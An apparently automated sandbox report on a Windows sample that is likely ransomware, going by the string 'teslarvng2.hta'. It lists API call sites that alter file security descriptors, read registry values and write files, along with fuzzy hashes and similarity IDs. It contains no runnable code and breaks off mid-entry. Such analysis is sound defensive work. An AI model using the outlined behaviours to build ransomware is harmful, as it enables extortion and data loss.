                                                                    • Instruction ID: 61b729cb058aa25116d1a2fdc750c208fc7a0bc13115e36ec267592c32be6b94
                                                                    • Opcode Fuzzy Hash: 7f8edd03703296efad95db6d37866a4df716df54eda18a08bcad590dd482251b
                                                                    • Instruction Fuzzy Hash: BC515C71D04249DFEB11DFA9C855BEEFBB4FB04704F10821DE82576282D7B56649CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E75B6D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E75B8D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E75BB5
                                                                    • std::_Facet_Register.LIBCPMT ref: 00E75CA5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E75CD9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID: "
                                                                    • API String ID: 459529453-357034475
                                                                    • Opcode ID: bd39e9bf304a5d210b82c0598eae1fcfd74b926c4d1a756a710820d92f00d48e
                                                                    • Instruction ID: ad98ca29589745570eb244be3a5a64bdfcb0cfbdcd8e8dbbde6ace49736374d1
                                                                    • Opcode Fuzzy Hash: bd39e9bf304a5d210b82c0598eae1fcfd74b926c4d1a756a710820d92f00d48e
                                                                    • Instruction Fuzzy Hash: F35187B1900648DFDB11DFA8C940BAEBBF4EF85314F248099D4197B391DBB5AE06CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • OpenProcessToken.ADVAPI32(00000008,?), ref: 00E84286
                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,0000012C,00000000,?,?,?), ref: 00E842DB
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 00E8432F
                                                                    • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?,?,?,?), ref: 00E8439B
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,?,?,?), ref: 00E843AF
                                                                    • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000101,00000000,00000000,00000000,?,?,?), ref: 00E843C4
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E843CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InfoNamedSecurity$Token$CloseEntriesHandleInformationOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 793342917-0
                                                                    • Opcode ID: 8ad87cf6901b8a5ed40e2785598ad0ae3b7d6e3efa132324511d723a6e2e39aa
                                                                    • Instruction ID: a31e786f03761cb49c3554cf2deed48171ca4bb3064205125a40a47a076d2453
                                                                    • Opcode Fuzzy Hash: 8ad87cf6901b8a5ed40e2785598ad0ae3b7d6e3efa132324511d723a6e2e39aa
                                                                    • Instruction Fuzzy Hash: 2F4133B1E41209AFEB209F91DC46FDEBBB9EF05708F101028F6057A2D1D7B669468B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,0000000E), ref: 00E89673
                                                                    • RegQueryValueExA.ADVAPI32(0000000E,ProductName,00000000,00000001,00000000,00000000), ref: 00E896C7
                                                                    • RegQueryValueExA.ADVAPI32(0000000E,ProductName,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E89716
                                                                    • RegCloseKey.ADVAPI32(0000000E), ref: 00E8971F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    • API String ID: 1586453840-1787575317
                                                                    • Opcode ID: 5ed955517073a81533e362f9371f2beb7025b190c488a23d6e78871b71c81399
                                                                    • Instruction ID: 07b6cc889f42404b6ef22e6323b6a42987f0c07e571cee661fa2d18f5e485b85
                                                                    • Opcode Fuzzy Hash: 5ed955517073a81533e362f9371f2beb7025b190c488a23d6e78871b71c81399
                                                                    • Instruction Fuzzy Hash: 4B513AB0D04249EBEB10DFA9D945BEEFBB4FB08704F10822AE91576281D7B56648CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 00EB75F6
                                                                    • __fassign.LIBCMT ref: 00EB77D5
                                                                    • __fassign.LIBCMT ref: 00EB77F2
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EB783A
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EB787A
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00EB7926
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                    • String ID:
                                                                    • API String ID: 4031098158-0
                                                                    • Opcode ID: 63fdb78eeee267adf0f736a860e6d307ec735926eb07bf50ee96e3bd691aa924
                                                                    • Instruction ID: 4419a5d304dcf7abbf2ce9566a6a768cb58c843d506854ca7c8fd1f8cf7846bc
                                                                    • Opcode Fuzzy Hash: 63fdb78eeee267adf0f736a860e6d307ec735926eb07bf50ee96e3bd691aa924
                                                                    • Instruction Fuzzy Hash: ECD18E75D082589FCF15CFA8C8809EEBBB5BF89314F28116AE895FB341D731A946CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76A1D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00E76A3D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76A65
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00E76BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                    • String ID:
                                                                    • API String ID: 593203224-0
                                                                    • Opcode ID: bb7bb257a0ff5c37135712617e239fb48d687e1cf83bbc7c9d80d7c926b7d10f
                                                                    • Instruction ID: d9b3451654e4c65ef729411340fb743e34e2d1ee02e162ef4af06447eb5e5184
                                                                    • Opcode Fuzzy Hash: bb7bb257a0ff5c37135712617e239fb48d687e1cf83bbc7c9d80d7c926b7d10f
                                                                    • Instruction Fuzzy Hash: 8FA18D71900219DFCB14DFA8C881BAEBBF5FF49314F148169E819BB291DB71AE11CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,A6ABE2D4,00000000,00000000,Function_00074DD0,000000FF,?,00E8569B), ref: 00E84198
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00E8569B), ref: 00E841A3
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841AC
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841B5
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841BE
                                                                    • CloseHandle.KERNEL32(?,?,00E8569B), ref: 00E841C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandle$EventObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 2857295742-0
                                                                    • Opcode ID: 293f54a7e6cc4776364f9726f7801080dca9d5e8f64ac4123774abb8b67ce491
                                                                    • Instruction ID: da5c3d98bbe5ff1bcdd58e46c64f97c810bb31ab800be76ccd298560323b9c73
                                                                    • Opcode Fuzzy Hash: 293f54a7e6cc4776364f9726f7801080dca9d5e8f64ac4123774abb8b67ce491
                                                                    • Instruction Fuzzy Hash: 7AF04F32408644EFC7115F96ED09E56BBB5FB08720F04473DF526A2AB0DB3B6819DB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,00000000), ref: 00E62D1C
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E62D3C
                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,00000000), ref: 00E62D46
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00E62D4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateFlushHandleWrite
                                                                    • String ID: teslarvng2.hta
                                                                    • API String ID: 4137531733-3500616496
                                                                    • Opcode ID: b81fe9a7bf92296943285e2dec7a32962d7d33bb954fbe550cf4bc5e15cda70b
                                                                    • Instruction ID: 44b409c6889a34d7cde50d30d37a92de6e5b26a22678a4886770fb50b953f06e
                                                                    • Opcode Fuzzy Hash: b81fe9a7bf92296943285e2dec7a32962d7d33bb954fbe550cf4bc5e15cda70b
                                                                    • Instruction Fuzzy Hash: 1B616B70D00208DFDB14DFA8D885BDEBBB0FF48314F148259E815BB292EB74A905CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EAF055,00E735BB,?,00EAF01D,?,?,00E735BB), ref: 00EAF075
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EAF088
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00EAF055,00E735BB,?,00EAF01D,?,?,00E735BB), ref: 00EAF0AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 10d8be9a9153a915b919e85660a000fe5a2777643698a10ffcb9ae7139ba06de
                                                                    • Instruction ID: d359551d1a36af6391b173ae0c887774c67f96b57ac81ae8bfff18a63e01e8b1
                                                                    • Opcode Fuzzy Hash: 10d8be9a9153a915b919e85660a000fe5a2777643698a10ffcb9ae7139ba06de
                                                                    • Instruction Fuzzy Hash: FBF08C31901218FFCB22AB96DC0AF9DBB78EF04759F084070F800B61A0CB728E46DA91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB54F9: GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                      • Part of subcall function 00EB54F9: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    • _free.LIBCMT ref: 00EB4BDA
                                                                    • _free.LIBCMT ref: 00EB4BF3
                                                                    • _free.LIBCMT ref: 00EB4C31
                                                                    • _free.LIBCMT ref: 00EB4C3A
                                                                    • _free.LIBCMT ref: 00EB4C46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3291180501-0
                                                                    • Opcode ID: 4ef11d2b918738bf8605ab6d5b890582b23e671417e1859d42c72ad8dabae8b1
                                                                    • Instruction ID: 286ff61d78910ebb0236754632f814351a4cb8a79f4a96ee93f3e4cc89500056
                                                                    • Opcode Fuzzy Hash: 4ef11d2b918738bf8605ab6d5b890582b23e671417e1859d42c72ad8dabae8b1
                                                                    • Instruction Fuzzy Hash: 96B11BB5A016199FDB24DF18C885BEAB7B4FF48314F1055EAE949A7391D731AE80CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00EB649C: RtlAllocateHeap.NTDLL(00000000,00000001,00E64831,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB64CE
                                                                    • _free.LIBCMT ref: 00EB4551
                                                                    • _free.LIBCMT ref: 00EB4568
                                                                    • _free.LIBCMT ref: 00EB4585
                                                                    • _free.LIBCMT ref: 00EB45A0
                                                                    • _free.LIBCMT ref: 00EB45B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3033488037-0
                                                                    • Opcode ID: f0d9d56a72079b6f6667441a9a643241cd19d2f630880ca64adae6f362565c72
                                                                    • Instruction ID: 88f626044a0bf12d4ed9a46d112876c9e9b3772cfc7ed7aaab1ed8c89a0de64d
                                                                    • Opcode Fuzzy Hash: f0d9d56a72079b6f6667441a9a643241cd19d2f630880ca64adae6f362565c72
                                                                    • Instruction Fuzzy Hash: 7B51E3B2A00604AFDB20DF69DC41BAB73F4EF49724F041569E859F72A2E731EE018B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EBE31F
                                                                      • Part of subcall function 00EB5945: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(00E64835,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835,00E64835), ref: 00EB596D
                                                                    • _free.LIBCMT ref: 00EBE331
                                                                    • _free.LIBCMT ref: 00EBE343
                                                                    • _free.LIBCMT ref: 00EBE355
                                                                    • _free.LIBCMT ref: 00EBE367
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 18fad16e67ebfc1bfa2ac6ced40ec8d2b98efb483e7ca10aaddb972e86ed81a7
                                                                    • Instruction ID: 301c80cb489644371aa6b72d15010dfbf1dc9de8cf2c48cd299f8eeaf0a3130d
                                                                    • Opcode Fuzzy Hash: 18fad16e67ebfc1bfa2ac6ced40ec8d2b98efb483e7ca10aaddb972e86ed81a7
                                                                    • Instruction Fuzzy Hash: 43F06233505688EF8660EBA5E4C1CEB77F9AB817307542809F058FB611C730FC804650
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00E630FB
                                                                    • RegSetValueExA.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004), ref: 00E6311A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E63123
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateValue
                                                                    • String ID: EulaAccepted
                                                                    • API String ID: 1818849710-921354838
                                                                    • Opcode ID: 73192e8e2ffe7808f13a17c3354f6da7653a194696f617dc33e8b8218ec58615
                                                                    • Instruction ID: 8ab1bbe335b7f5bb123067d6e6e7a1192c48e00c2151361d5ad6a796959fbc5d
                                                                    • Opcode Fuzzy Hash: 73192e8e2ffe7808f13a17c3354f6da7653a194696f617dc33e8b8218ec58615
                                                                    • Instruction Fuzzy Hash: D6F01270A8430CBFDB10EF55DC46FADB779EB44B00F108165BB01BA2D0D6B26A098B58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: d29d20563786fc555bd143e5b21a4874a2350ae9dceed5f6a1396ed4937a3036
                                                                    • Instruction ID: bf97a9d8b5aa64ceb58bbfb704a5181ec3c16995394ba85ea12646e0d6054010
                                                                    • Opcode Fuzzy Hash: d29d20563786fc555bd143e5b21a4874a2350ae9dceed5f6a1396ed4937a3036
                                                                    • Instruction Fuzzy Hash: D3B11072A002859FDB15CF68C891BEFBBF5EF45304F14A1AAE855FB241D6389D02CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80920653a438ec5ae2c4b367d8e0b79c5a949c165fb300433ce649beafd4899f
                                                                    • Instruction ID: d1e1058927eb2346f052b298f00fc08573560476525cf85d243011f7a846ab73
                                                                    • Opcode Fuzzy Hash: 80920653a438ec5ae2c4b367d8e0b79c5a949c165fb300433ce649beafd4899f
                                                                    • Instruction Fuzzy Hash: DE213531608208AFDB206BA09C05FDF7FE8EB813A5F651174E991BB190D7719C00A790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,?,00EACBB0,00000000,00000000,?,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB54FE
                                                                    • _free.LIBCMT ref: 00EB555B
                                                                    • _free.LIBCMT ref: 00EB5591
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EBA55B,00000000,00000000,?,00000000,?), ref: 00EB559C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 666591dc1270f1da334b235b059552bf530d4465b63b883ce4e70bcee56d193a
                                                                    • Instruction ID: 1f79c522a87d7e389fc7f23bba3356a25260841f88ec22cb220fa5026a0bf99e
                                                                    • Opcode Fuzzy Hash: 666591dc1270f1da334b235b059552bf530d4465b63b883ce4e70bcee56d193a
                                                                    • Instruction Fuzzy Hash: AF11C633206D49AED63127B5ECC6FEB229BCBC57797342634F220B61E2DE22CD054611
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000001,00000001,00E64837,00EACDBD,00EB64DF,00E64831,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB5655
                                                                    • _free.LIBCMT ref: 00EB56B2
                                                                    • _free.LIBCMT ref: 00EB56E8
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB56F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast_free
                                                                    • String ID:
                                                                    • API String ID: 2283115069-0
                                                                    • Opcode ID: 60610d436054d0c16c1d17b3a5aeba8199c409547a6be2d57b69509216d7ae87
                                                                    • Instruction ID: cd0922f9dd3799cba7df75dd222612b004dbed7b131561dfa66706c7b33d3501
